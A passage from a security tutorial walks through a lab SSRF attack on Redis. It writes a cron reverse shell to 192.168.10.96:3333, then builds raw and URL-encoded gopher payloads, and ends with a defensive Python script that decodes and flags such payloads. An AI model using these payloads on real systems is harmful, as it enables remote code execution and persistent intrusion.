
SSRF vulnerabilities (part 1) · Farmsec Open Source (5)

Open another terminal and enter the following commands one after another:

redis-cli -h 127.0.0.1 flushall   # delete every key in Redis, not only those in the current database, i.e. empty the instance
echo -e "\n\n*/1 * * * * bash -i >&/dev/tcp/192.168.10.96/3333 0>&1\n\n" | redis-cli -h 127.0.0.1 -x set farmsec   # write the echoed content through the client into the buffer as the value of the key farmsec
redis-cli -h 127.0.0.1 config set dir /var/spool/cron/   # set the working directory
redis-cli -h 127.0.0.1 config set dbfilename root   # set the name of the saved file
redis-cli -h 127.0.0.1 save   # write the buffer contents into the file root


7.4.7 Capturing the attack traffic

Go back to the socat terminal and copy the captured traffic:

> 2022/04/08 10:35:41.854951 length=18 from=0 to=17
*1\r
$8\r
flushall\r
< 2022/04/08 10:35:41.916498 length=5 from=0 to=4
+OK\r
> 2022/04/08 10:35:52.438603 length=92 from=0 to=91
*3\r
$3\r
set\r
$7\r
farmsec\r
$59\r
*/1 * * * * bash -i >&/dev/tcp/192.168.10.96/3333 0>&1
\r
< 2022/04/08 10:35:52.439439 length=5 from=0 to=4
+OK\r
> 2022/04/08 10:36:02.585302 length=57 from=0 to=56
*4\r
$6\r
config\r
$3\r
set\r
$3\r
dir\r
$16\r
/var/spool/cron/\r
< 2022/04/08 10:36:02.586108 length=5 from=0 to=4
+OK\r
> 2022/04/08 10:36:08.471573 length=52 from=0 to=51
*4\r
$6\r
config\r
$3\r
set\r
$10\r
dbfilename\r
$4\r
root\r
< 2022/04/08 10:36:08.472274 length=5 from=0 to=4
+OK\r
> 2022/04/08 10:41:22.008184 length=14 from=0 to=13
*1\r
$4\r
save\r
< 2022/04/08 10:41:22.014742 length=5 from=0 to=4
+OK\r


The cron job runs the reverse connection once every minute, so after at most one minute the returned shell appears, which shows that the test statement executes and the attack succeeds.

Cron job on the test machine 192.168.11.192: (screenshot not reproduced)

nc reverse-shell listener: (screenshot not reproduced)

7.4.8 Converting the attack traffic to gopher protocol format

Copy the attack traffic captured by socat and save it as 1.txt in the ssrftool toolkit.


7.4.9 Formatting the attack statement

Format the attack statement into gopher protocol format:

python 1.py 1.txt

*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$7%0d%0afarmsec%0d%0a$59%0d%0a%0a%0a*/1 * * * * bash -i >&/dev/tcp/192.168.10.96/3333 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a%0a


7.4.10 Constructing the gopher-format attack statement

Prepend the attack target gopher://192.168.11.203:6379/_ to the formatted attack statement:

gopher://192.168.11.203:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$7%0d%0afarmsec%0d%0a$59%0d%0a%0a%0a*/1 * * * * bash -i >&/dev/tcp/192.168.10.96/3333 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0a%0a

7.4.11 URL-encoding the attack statement

URL-encoded:

gopher%3A%2F%2F192.168.11.203%3A6379%2F_*1%250d%250a%248%250d%250aflushall%250d%250a*3%250d%250a%243%250d%250aset%250d%250a%247%250d%250afarmsec%250d%250a%2459%250d%250a%250a%250a*%2F1%20*%20*%20*%20*%20bash%20-i%20%3E%26%2Fdev%2Ftcp%2F192.168.10.96%2F3333%200%3E%261%250a%250a%250a%250d%250a*4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2Fvar%2Fspool%2Fcron%2F%250d%250a*4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a*1%250d%250a%244%250d%250asave%250d%250a%250a

7.4.12 Testing the attack statement
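The two encoding layers built up in 7.4.9 through 7.4.11 (RESP line endings as %0d%0a, then the whole gopher URL percent-encoded once more) are exactly what the application on the receiving end has to undo before it can see that it is being asked to talk to port 6379. The following added example, which is not code from the Farmsec write-up or from the ssrftool toolkit, is a defender-side check for a URL an application is about to fetch on a user's behalf: it percent-decodes until the value stops changing, rejects every scheme except http/https, and, for a gopher URL, parses the embedded RESP stream (the same format shown in the socat capture of 7.4.7) so the smuggled Redis commands are visible in logs. The sample input is the page's own encoded payload; the function names and the SUSPICIOUS command list are this example's own choices.

```python
"""
Added example (not from the Farmsec write-up): inspect a URL that a server-side
fetcher is about to request, undo repeated percent-encoding, enforce a scheme
allowlist, and decode the Redis RESP stream hidden inside a gopher:// payload.
"""
import re
from urllib.parse import unquote

ALLOWED_SCHEMES = {"http", "https"}

# Redis commands that have no business arriving through a URL fetcher. The
# CONFIG SET dir / dbfilename pair is what turns a SAVE into a file write.
SUSPICIOUS = {"flushall", "config", "save", "bgsave", "slaveof", "replicaof",
              "eval", "module", "debug"}

# Constructed sample input: the page's own doubly encoded payload from 7.4.11.
SAMPLE_URL = ("gopher%3A%2F%2F192.168.11.203%3A6379%2F_*1%250d%250a%248%250d%250aflushall%250d%250a*3%250d%250a%243%250d%250aset%250d%250a%247%250d%250afarmsec%250d%250a%2459%250d%250a%250a%250a*%2F1%20*%20*%20*%20*%20bash%20-i%20%3E%26%2Fdev%2Ftcp%2F192.168.10.96%2F3333%200%3E%261%250a%250a%250a%250d%250a*4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%243%250d%250adir%250d%250a%2416%250d%250a%2Fvar%2Fspool%2Fcron%2F%250d%250a*4%250d%250a%246%250d%250aconfig%250d%250a%243%250d%250aset%250d%250a%2410%250d%250adbfilename%250d%250a%244%250d%250aroot%250d%250a*1%250d%250a%244%250d%250asave%250d%250a%250a")


def fully_unquote(value, max_rounds=5):
    """Percent-decode until the string stops changing (bounded), so a value
    that was encoded twice is still inspected in its final form."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def _read_line(data, pos):
    """Return (line without trailing CR, position after the LF); (None, end) if no LF."""
    end = data.find("\n", pos)
    if end == -1:
        return None, len(data)
    return data[pos:end].rstrip("\r"), end + 1


def parse_resp(data):
    """Parse a RESP stream (possibly preceded by junk such as the gopher '_'
    selector byte) into a list of argument lists. Bulk strings are read by
    their declared length, so a value that itself contains newlines, like a
    crontab line, stays intact instead of being split into bogus commands."""
    commands = []
    pos, n = 0, len(data)
    while pos < n:
        if data[pos] != "*":
            pos += 1                      # skip until the next array header
            continue
        header, pos = _read_line(data, pos)
        if header is None or not header[1:].isdigit():
            break
        args = []
        for _ in range(int(header[1:])):
            blen_line, pos = _read_line(data, pos)
            if (blen_line is None or not blen_line.startswith("$")
                    or not blen_line[1:].isdigit()):
                return commands           # truncated or malformed: keep what we have
            blen = int(blen_line[1:])
            args.append(data[pos:pos + blen])
            pos += blen
            if data.startswith("\r\n", pos):   # terminator after the bulk string
                pos += 2
            elif data.startswith("\n", pos):
                pos += 1
        commands.append(args)
    return commands


def flag_commands(commands):
    """Return human-readable findings for the commands worth alerting on."""
    findings = []
    for args in commands:
        if not args:
            continue
        name = args[0].lower()
        if name in SUSPICIOUS:
            findings.append(" ".join(args).replace("\r", "\\r").replace("\n", "\\n"))
        elif name == "set" and len(args) >= 3 and "\n" in args[2]:
            # multi-line values are the hallmark of crontab / authorized_keys writes
            findings.append("set %s <multi-line value>" % args[1])
    return findings


def inspect_url(url):
    """Decide whether the fetcher may request this URL and report what a gopher
    payload would send to the target port."""
    decoded = fully_unquote(url)
    m = re.match(r"([A-Za-z][A-Za-z0-9+.-]*):", decoded)
    scheme = m.group(1).lower() if m else ""
    report = {"scheme": scheme, "allowed": scheme in ALLOWED_SCHEMES,
              "commands": [], "findings": []}
    if scheme == "gopher":
        # gopher://host:port/<type><selector>: everything after the authority's
        # trailing '/' is written to the socket verbatim, so parse it as RESP
        rest = decoded[m.end():]
        slash = rest.find("/", 2) if rest.startswith("//") else -1
        selector = rest[slash + 1:] if slash != -1 else rest
        report["commands"] = parse_resp(selector)
        report["findings"] = flag_commands(report["commands"])
    return report


if __name__ == "__main__":
    r = inspect_url(SAMPLE_URL)
    print("scheme=%s allowed=%s" % (r["scheme"], r["allowed"]))
    for f in r["findings"]:
        print("  flagged:", f)
```

The scheme allowlist is the actual control: an outbound fetcher that only ever speaks http/https cannot be pointed at Redis no matter how the payload is encoded. The RESP decoding exists for the alert, so that the log entry says "config set dir /var/spool/cron/" rather than an opaque blob, and the bounded decode loop keeps a second layer of percent-encoding from hiding that. Note that Python's urlsplit strips CR and LF characters from its input, which is why the scheme is taken with a plain regular expression here instead of passing the decoded payload through the URL library.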